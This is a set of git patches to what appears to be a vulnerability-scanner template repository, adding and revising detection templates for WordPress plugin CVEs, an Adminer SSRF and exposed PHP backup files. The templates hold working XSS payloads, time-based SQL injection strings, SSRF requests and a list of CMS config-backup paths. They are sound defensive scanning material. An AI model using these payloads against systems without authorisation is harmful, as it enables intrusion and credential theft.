- Cross-Site Scripting author: dwisiswant0 - severity: medium + severity: critical description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ @@ -11,7 +11,10 @@ info: - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14 - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 cve-id: CVE-2021-32853 + cwe-id: CWE-79 metadata: shodan-query: http.title:"erxes" tags: cve,cve2021,xss,erxes,oss From a509a28caf1c9f2defcca63a2b7c902f4a85b60b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 4 Mar 2023 04:02:11 +0000 Subject: [PATCH 70/84] Auto WordPress Plugins Update [Sat Mar 4 04:02:10 UTC 2023] :robot: --- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 87e5fea55f..402b44e6a9 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.0.20 \ No newline at end of file +3.0.21 \ No newline at end of file From 3dfd9e391503d747423b0a0b09036afe1520ab1e Mon Sep 17 00:00:00 2001 From: QAQ <104293903+pwnhxl@users.noreply.github.com> Date: Sat, 4 Mar 2023 16:05:35 +0800 Subject: [PATCH 71/84] Fix cve-2021-21311 (#6821) * update zip-backup-files * fix cve-2021-21311 * Update CVE-2021-21311.yaml * Update php-backup-files * add exposed-ds_store.yaml * lint fixes * added more matchers! * removed duplicate template * misc formatting update * added fuzz tags --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- cves/2021/CVE-2021-21311.yaml | 33 +++++-- exposures/backups/php-backup-files.yaml | 113 ++++++++++++++++++------ exposures/files/ds-store-file.yaml | 35 ++++---- 3 files changed, 129 insertions(+), 52 deletions(-) diff --git a/cves/2021/CVE-2021-21311.yaml b/cves/2021/CVE-2021-21311.yaml index d8481e1aaf..a671b0f013 100644 --- a/cves/2021/CVE-2021-21311.yaml +++ b/cves/2021/CVE-2021-21311.yaml @@ -2,7 +2,7 @@ id: CVE-2021-21311 info: name: Adminer <4.7.9 - Server-Side Request Forgery - author: Adam Crosser + author: Adam Crosser,pwnhxl severity: high description: Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. reference: @@ -18,16 +18,35 @@ info: cwe-id: CWE-918 metadata: shodan-query: title:"Login - Adminer" + hunter-query: app.name="Adminer"&&web.body="4.7.8" + fofa-query: app="Adminer" && body="4.7.8" tags: cve,cve2021,adminer,ssrf requests: - - method: GET - path: - - "{{BaseURL}}/adminer?elastic=interact.sh&username=" + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} + + redirects: true + max-redirects: 1 + cookie-reuse: true + attack: batteringram + payloads: + path: + - "/index.php" + - "/adminer.php" + - "/adminer/adminer.php" + - "/adminer/index.php" + - "/_adminer.php" + - "/_adminer/index.php" + + stop-at-first-match: true matchers-condition: and matchers: - - type: word part: body words: @@ -35,6 +54,4 @@ requests: - type: status status: - - 403 - -# Enhanced by mp on 2022/06/27 + - 403 \ No newline at end of file diff --git a/exposures/backups/php-backup-files.yaml b/exposures/backups/php-backup-files.yaml index 1056a85f8e..afdf592cf4 100644 --- a/exposures/backups/php-backup-files.yaml +++ b/exposures/backups/php-backup-files.yaml @@ -2,33 +2,86 @@ id: php-backup-files info: name: PHP Source - Backup File Information Disclosure - author: StreetOfHackerR007 (Rohit Soni) + author: StreetOfHackerR007,pwnhxl severity: medium - description: Multiple PHP sources were detected via backup files. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: exposure,backup,php,disclosure + tags: exposure,backup,php,disclosure,fuzz requests: - method: GET path: - - "{{BaseURL}}/index.php.bak" - - "{{BaseURL}}/default.php.bak" - - "{{BaseURL}}/main.php.bak" - - "{{BaseURL}}/config.php.bak" - - "{{BaseURL}}/settings.php.bak" - - "{{BaseURL}}/header.php.bak" - - "{{BaseURL}}/footer.php.bak" - - "{{BaseURL}}/login.php.bak" - - "{{BaseURL}}/database.php.bak" - - "{{BaseURL}}/db.php.bak" - - "{{BaseURL}}/conn.php.bak" - - "{{BaseURL}}/db_config.php.bak" - - "{{BaseURL}}/404.php.bak" - - "{{BaseURL}}/wp-config.php.bak" - - "{{BaseURL}}/wp-login.php.bak" + - "{{BaseURL}}{{filepath}}{{bakext}}" + + attack: clusterbomb + payloads: + filepath: + - /wp-config.php # wordpress + - /site/default/settings.php # drupal + - /installation/configuration.php # joomla + - /app/etc/env.php # magento + - /Application/Common/Conf/config.php # thinkphp + - /environments/dev/common/config/main-local.php # yii + - /environments/prod/common/config/main-local.php # yii + - /common/config/main-local.php # yii + - /system/config/default.php # opencart + - /typo3conf/localconf.php # typo3 + - /config/config_global.php # discuz + - /config/config_ucenter.php # discuz + - /textpattern/config.php # textpattern + - /data/common.inc.php # dedecms + - /caches/configs/database.php # phpcms + - /caches/configs/system.php # phpcms + - /include/config.inc.php # phpcms + - /phpsso_server/caches/configs/database.php # phpcms + - /phpsso_server/caches/configs/system.php # phpcms + - /zb_users/c_option.php # zblog + - /e/class/config.php # empirecms + - /e/config/config.php # empirecms + - /data/sql_config.php # phpwind + - /data/bbscache/config.php # phpwind + - /db.php + - /conn.php + - /database.php + - /db_config.php + - /config.inc.php + - /data/config.php + - /config/config.php + - /index.php + - /default.php + - /main.php + - /settings.php + - /header.php + - /footer.php + - /login.php + - /404.php + - /wp-login.php + - /config.php + + bakext: + - ".~" + - ".bk" + - ".bak" + - ".BAK" + - ".swp" + - ".swo" + - ".swn" + - ".tmp" + - ".save" + - ".old" + - ".new" + - ".orig" + - ".dist" + - ".txt" + - ".disabled" + - ".original" + - ".backup" + - "_bak" + - "_1.bak" + - "~" + - "!" + - ".0" + - ".1" + - ".2" + - ".3" matchers-condition: and matchers: @@ -37,22 +90,26 @@ requests: - 200 - type: word + part: body words: - "<?php" - "<?=" condition: or - part: body - type: word + part: body words: - "?>" - part: body + - "($" + - "$_GET[" + - "$_POST[" + - "$_REQUEST[" + - "$_SERVER[" + condition: or - type: word + part: header words: - "text/plain" - "bytes" - part: header - condition: or - -# Enhanced by md on 2023/02/08 + condition: or \ No newline at end of file diff --git a/exposures/files/ds-store-file.yaml b/exposures/files/ds-store-file.yaml index d43bea10f3..a17eb4d609 100644 --- a/exposures/files/ds-store-file.yaml +++ b/exposures/files/ds-store-file.yaml @@ -1,10 +1,12 @@ id: ds-store-file info: - name: Directory Listing via DS_Store - author: 0w4ys + name: Exposed DS_Store File + author: 0w4ys,pwnhxl severity: info - tags: exposure,files + reference: + - https://github.com/lijiejie/ds_store_exp + tags: exposure,files,ds_store,config requests: - method: GET @@ -13,17 +15,18 @@ requests: matchers-condition: and matchers: - - type: word - words: - - "\x00@\x00" - - - type: status - status: - - 200 - - - type: word - words: - - "Accept-Ranges: bytes" - - "octet-stream" + - type: dsl + dsl: + - "contains(body, '\x00@\x00')" + - "contains(hex_encode(body), '0000000142756431')" condition: or - part: header + + - type: dsl + dsl: + - 'status_code == 200' + + - type: dsl + dsl: + - 'contains(to_lower(header), "accept-ranges: bytes")' + - 'contains(to_lower(header), "octet-stream")' + condition: or \ No newline at end of file From 4e9802beabcd62cf8f2a37bdbfe693273858d201 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 4 Mar 2023 08:06:08 +0000 Subject: [PATCH 73/84] Auto Generated cves.json [Sat Mar 4 08:06:08 UTC 2023] :robot: --- cves.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves.json b/cves.json index d503d43662..060efe8bd2 100644 --- a/cves.json +++ b/cves.json @@ -1136,7 +1136,7 @@ {"ID":"CVE-2021-32789","Info":{"Name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","Severity":"high","Description":"woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-32789.yaml"} {"ID":"CVE-2021-32819","Info":{"Name":"Nodejs Squirrelly - Remote Code Execution","Severity":"high","Description":"Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-32819.yaml"} {"ID":"CVE-2021-32820","Info":{"Name":"Express-handlebars - Local File Inclusion","Severity":"high","Description":"Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2021/CVE-2021-32820.yaml"} -{"ID":"CVE-2021-32853","Info":{"Name":"Erxes \u003c0.23.0 - Cross-Site Scripting","Severity":"medium","Description":"Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-32853.yaml"} +{"ID":"CVE-2021-32853","Info":{"Name":"Erxes \u003c0.23.0 - Cross-Site Scripting","Severity":"critical","Description":"Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2021/CVE-2021-32853.yaml"} {"ID":"CVE-2021-3293","Info":{"Name":"emlog 5.3.1 Path Disclosure","Severity":"high","Description":"emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-3293.yaml"} {"ID":"CVE-2021-3297","Info":{"Name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","Severity":"high","Description":"Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.","Classification":{"CVSSScore":"7.8"}},"file_path":"cves/2021/CVE-2021-3297.yaml"} {"ID":"CVE-2021-33044","Info":{"Name":"Dahua IPC/VTH/VTO - Authentication Bypass","Severity":"critical","Description":"Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-33044.yaml"} From 615e4e531d1aab8c91a8cec32ef15f324f07f56f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 4 Mar 2023 08:22:19 +0000 Subject: [PATCH 74/84] Auto Generated CVE annotations [Sat Mar 4 08:22:19 UTC 2023] :robot: --- cves/2009/CVE-2009-3318.yaml | 1 + cves/2009/CVE-2009-4679.yaml | 1 + cves/2021/CVE-2021-21311.yaml | 4 ++-- 3 files changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml index 3b39d07580..ab0ca2df38 100644 --- a/cves/2009/CVE-2009-3318.yaml +++ b/cves/2009/CVE-2009-3318.yaml @@ -9,6 +9,7 @@ info: - https://www.exploit-db.com/exploits/9706 - https://nvd.nist.gov/vuln/detail/CVE-2009-3318 - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/ + - http://www.exploit-db.com/exploits/9706 classification: cve-id: CVE-2009-3318 tags: joomla,lfi,edb,cve,cve2009 diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml index e247929adb..c34f5cd274 100644 --- a/cves/2009/CVE-2009-4679.yaml +++ b/cves/2009/CVE-2009-4679.yaml @@ -10,6 +10,7 @@ info: - https://www.exploit-db.com/exploits/33440 - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/ + - http://www.exploit-db.com/exploits/10754 classification: cve-id: CVE-2009-4679 tags: cve,cve2009,joomla,lfi,nexus,edb diff --git a/cves/2021/CVE-2021-21311.yaml b/cves/2021/CVE-2021-21311.yaml index a671b0f013..2ab6d03fa3 100644 --- a/cves/2021/CVE-2021-21311.yaml +++ b/cves/2021/CVE-2021-21311.yaml @@ -17,9 +17,9 @@ info: cve-id: CVE-2021-21311 cwe-id: CWE-918 metadata: - shodan-query: title:"Login - Adminer" - hunter-query: app.name="Adminer"&&web.body="4.7.8" fofa-query: app="Adminer" && body="4.7.8" + hunter-query: app.name="Adminer"&&web.body="4.7.8" + shodan-query: title:"Login - Adminer" tags: cve,cve2021,adminer,ssrf requests: From 068ab59405553554479252e2f6680a528538d345 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 5 Mar 2023 04:01:59 +0000 Subject: [PATCH 75/84] Auto WordPress Plugins Update [Sun Mar 5 04:01:59 UTC 2023] :robot: --- helpers/wordpress/plugins/siteorigin-panels.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index b341aa021e..9b38a8572c 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.20.4 \ No newline at end of file +2.20.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 1163055e28..6ca6df113f 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.7.0 \ No newline at end of file +4.8.0 \ No newline at end of file From 98f10b634618a801c0116c09662659ba311d0b6c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 5 Mar 2023 18:57:32 +0530 Subject: [PATCH 76/84] reference -update --- ssl/mismatched-ssl.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/ssl/mismatched-ssl.yaml b/ssl/mismatched-ssl.yaml index f688c931e5..8626b409de 100644 --- a/ssl/mismatched-ssl.yaml +++ b/ssl/mismatched-ssl.yaml @@ -4,6 +4,14 @@ info: name: Mismatched SSL Certificate author: pdteam severity: low + description: | + Mismatched SSL vulnerability occurs when an SSL-enabled web server is configured to accept connections with both TLS and SSL protocols, allowing attackers to downgrade the security of a connection to a weaker, more vulnerable version of the protocol. + This vulnerability can be exploited to gain access to sensitive data and potentially gain control of the system. + reference: | + - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/ssl-certificate-name-hostname-mismatch/ + - https://www.tenable.com/plugins/nessus/45411 + remediation: | + Ensure that all SSL certificates are issued by trusted Certificate Authorities. Check the Certificate Authorities list of the server to ensure that all SSL certificates have been issued by a trusted CA. tags: ssl ssl: @@ -12,4 +20,4 @@ ssl: matchers: - type: dsl dsl: - - "mismatched == true" \ No newline at end of file + - "mismatched == true" From 2b01c631a4234262edadd6effdc822adc1950723 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Sun, 5 Mar 2023 19:12:10 +0530 Subject: [PATCH 78/84] templates added --- cves/2015/CVE-2015-2755.yaml | 41 ++++++++ cves/2015/CVE-2015-4062.yaml | 44 +++++++++ cves/2015/CVE-2015-4063.yaml | 37 +++++++ cves/2015/CVE-2015-9312.yaml | 38 +++++++ cves/2017/CVE-2017-14622.yaml | 40 ++++++++ cves/2018/CVE-2018-16159.yaml | 40 ++++++++ cves/2021/CVE-2021-24145.yaml | 64 ++++++++++++ cves/2021/CVE-2021-24155.yaml | 77 +++++++++++++++ cves/2021/CVE-2021-24169.yaml | 39 ++++++++ cves/2021/CVE-2021-24287.yaml | 39 ++++++++ cves/2021/CVE-2021-24347.yaml | 98 +++++++++++++++++++ cves/2021/CVE-2021-24554.yaml | 44 +++++++++ cves/2021/CVE-2021-24875.yaml | 42 ++++++++ cves/2021/CVE-2021-24931.yaml | 37 +++++++ cves/2021/CVE-2021-25067.yaml | 44 +++++++++ cves/2021/CVE-2021-27520.yaml | 40 ++++++++ cves/2022/CVE-2022-0693.yaml | 35 +++++++ cves/2022/CVE-2022-0760.yaml | 39 ++++++++ cves/2022/CVE-2022-0949.yaml | 56 +++++++++++ cves/2022/CVE-2022-1013.yaml | 40 ++++++++ cves/2022/CVE-2022-3934.yaml | 42 ++++++++ cves/2022/CVE-2022-4060.yaml | 46 +++++++++ cves/2022/CVE-2022-4063.yaml | 42 ++++++++ cves/2022/CVE-2022-4301.yaml | 43 ++++++++ cves/2022/CVE-2022-4306.yaml | 42 ++++++++ cves/2022/CVE-2022-45805.yaml | 44 +++++++++ cves/2022/CVE-2022-46888.yaml | 39 ++++++++ cves/2022/CVE-2022-4897.yaml | 42 ++++++++ cves/2023/CVE-2023-23492.yaml | 40 ++++++++ .../wordpress/3d-print-lite-xss.yaml | 38 +++++++ .../wordpress/wp-touch-redirect.yaml | 25 +++++ 31 files changed, 1377 insertions(+) create mode 100644 cves/2015/CVE-2015-2755.yaml create mode 100644 cves/2015/CVE-2015-4062.yaml create mode 100644 cves/2015/CVE-2015-4063.yaml create mode 100644 cves/2015/CVE-2015-9312.yaml create mode 100644 cves/2017/CVE-2017-14622.yaml create mode 100644 cves/2018/CVE-2018-16159.yaml create mode 100644 cves/2021/CVE-2021-24145.yaml create mode 100644 cves/2021/CVE-2021-24155.yaml create mode 100644 cves/2021/CVE-2021-24169.yaml create mode 100644 cves/2021/CVE-2021-24287.yaml create mode 100644 cves/2021/CVE-2021-24347.yaml create mode 100644 cves/2021/CVE-2021-24554.yaml create mode 100644 cves/2021/CVE-2021-24875.yaml create mode 100644 cves/2021/CVE-2021-24931.yaml create mode 100644 cves/2021/CVE-2021-25067.yaml create mode 100644 cves/2021/CVE-2021-27520.yaml create mode 100644 cves/2022/CVE-2022-0693.yaml create mode 100644 cves/2022/CVE-2022-0760.yaml create mode 100644 cves/2022/CVE-2022-0949.yaml create mode 100644 cves/2022/CVE-2022-1013.yaml create mode 100644 cves/2022/CVE-2022-3934.yaml create mode 100644 cves/2022/CVE-2022-4060.yaml create mode 100644 cves/2022/CVE-2022-4063.yaml create mode 100644 cves/2022/CVE-2022-4301.yaml create mode 100644 cves/2022/CVE-2022-4306.yaml create mode 100644 cves/2022/CVE-2022-45805.yaml create mode 100644 cves/2022/CVE-2022-46888.yaml create mode 100644 cves/2022/CVE-2022-4897.yaml create mode 100644 cves/2023/CVE-2023-23492.yaml create mode 100644 vulnerabilities/wordpress/3d-print-lite-xss.yaml create mode 100644 vulnerabilities/wordpress/wp-touch-redirect.yaml diff --git a/cves/2015/CVE-2015-2755.yaml b/cves/2015/CVE-2015-2755.yaml new file mode 100644 index 0000000000..edf698e6a2 --- /dev/null +++ b/cves/2015/CVE-2015-2755.yaml @@ -0,0 +1,41 @@ +id: CVE-2015-2755 + +info: + name: AB Google Map Travel (AB-MAP) Wordpress Plugin <=3.4 - Stored XSS + author: r3Y3r53 + severity: medium + description: | + Multiple cross-site scripting vulnerabilities in the AB Google Map Travel (AB-MAP) plugin before 4.0 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameter in the ab_map_options page to wp-admin/admin.php. + reference: + - https://packetstormsecurity.com/files/131155/ + - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755 + metadata: + verified: "true" + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 10s + POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")' + - 'contains(body_2, "ab-google-map-travel")' + condition: and diff --git a/cves/2015/CVE-2015-4062.yaml b/cves/2015/CVE-2015-4062.yaml new file mode 100644 index 0000000000..6c59c3809c --- /dev/null +++ b/cves/2015/CVE-2015-4062.yaml @@ -0,0 +1,44 @@ +id: CVE-2015-4062 + +info: + name: NewStatPress 0.9.8 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The NewStatPress WordPress plugin was affected by SQL Injection security vulnerability. + reference: + - https://packetstormsecurity.com/files/132038/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-4062 + - https://wordpress.org/plugins/newstatpress + remediation: | + Update to plugin version 0.9.9 or latest + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-4062 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2015,sqli,wordpress,wp-plugin,wp,authenticated,newstatpress + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body_2, "newstatpress_page_nsp_search")' + condition: and diff --git a/cves/2015/CVE-2015-4063.yaml b/cves/2015/CVE-2015-4063.yaml new file mode 100644 index 0000000000..75d5e53fe3 --- /dev/null +++ b/cves/2015/CVE-2015-4063.yaml @@ -0,0 +1,37 @@ +id: CVE-2015-4063 + +info: + name: NewStatPress 0.9.8 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + remediation: Update to plugin version 0.9.9 or latest. + reference: + - https://packetstormsecurity.com/files/132038/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-4063 + - https://wordpress.org/plugins/newstatpress/ + metadata: + verified: "true" + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log=admin&pwd=admin123&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')" + condition: and diff --git a/cves/2015/CVE-2015-9312.yaml b/cves/2015/CVE-2015-9312.yaml new file mode 100644 index 0000000000..672bce98df --- /dev/null +++ b/cves/2015/CVE-2015-9312.yaml @@ -0,0 +1,38 @@ +id: CVE-2015-9312 + +info: + name: NewStatPress <= 1.0.4 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nsp_search.php’ several variables from the $_GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger a Reflected XSS attack. + remediation: Fixed in version 1.0.6 + reference: + - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 + - https://nvd.nist.gov/vuln/detail/CVE-2015-9312 + - https://g0blin.co.uk/g0blin-00057/ + metadata: + verified: "true" + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "<img src=x onerror=alert(document.domain)")' + - 'contains(body_2, "newstatpress")' + condition: and diff --git a/cves/2017/CVE-2017-14622.yaml b/cves/2017/CVE-2017-14622.yaml new file mode 100644 index 0000000000..74dfe4884c --- /dev/null +++ b/cves/2017/CVE-2017-14622.yaml @@ -0,0 +1,40 @@ +id: CVE-2017-14622 + +info: + name: 2kb Amazon Affiliates Store plugin < 2.1.1 - Reflected Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Multiple cross-site scripting (XSS) vulnerabilities in the 2kb Amazon Affiliates Store plugin before 2.1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php. + reference: + - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html + - http://www.securityfocus.com/bid/101050 + - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 + metadata: + verified: "true" + tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 500' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "<script>alert(document.domain)</script>")' + - 'contains(body_2, "2kb-amazon-affiliates-store")' + condition: and diff --git a/cves/2018/CVE-2018-16159.yaml b/cves/2018/CVE-2018-16159.yaml new file mode 100644 index 0000000000..e9bf735a6d --- /dev/null +++ b/cves/2018/CVE-2018-16159.yaml @@ -0,0 +1,40 @@ +id: CVE-2018-16159 + +info: + name: Gift Voucher < 4.1.8 - Unauthenticated Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The Gift Vouchers plugin through 2.0.1 for WordPress allows SQL Injection via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. + remediation: Fixed in version 4.1.8 + reference: + - https://wpscan.com/vulnerability/9117 + - https://wordpress.org/plugins/gift-voucher/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-16159 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-16159 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2018,sqli,wordpress,wp-plugin,wp,gift-voucher,unauth + +requests: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=wpgv_doajax_front_template&template_id=1 and sleep(6)# + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains(body, "images") && contains(body, "title")' + condition: and diff --git a/cves/2021/CVE-2021-24145.yaml b/cves/2021/CVE-2021-24145.yaml new file mode 100644 index 0000000000..37013d6849 --- /dev/null +++ b/cves/2021/CVE-2021-24145.yaml @@ -0,0 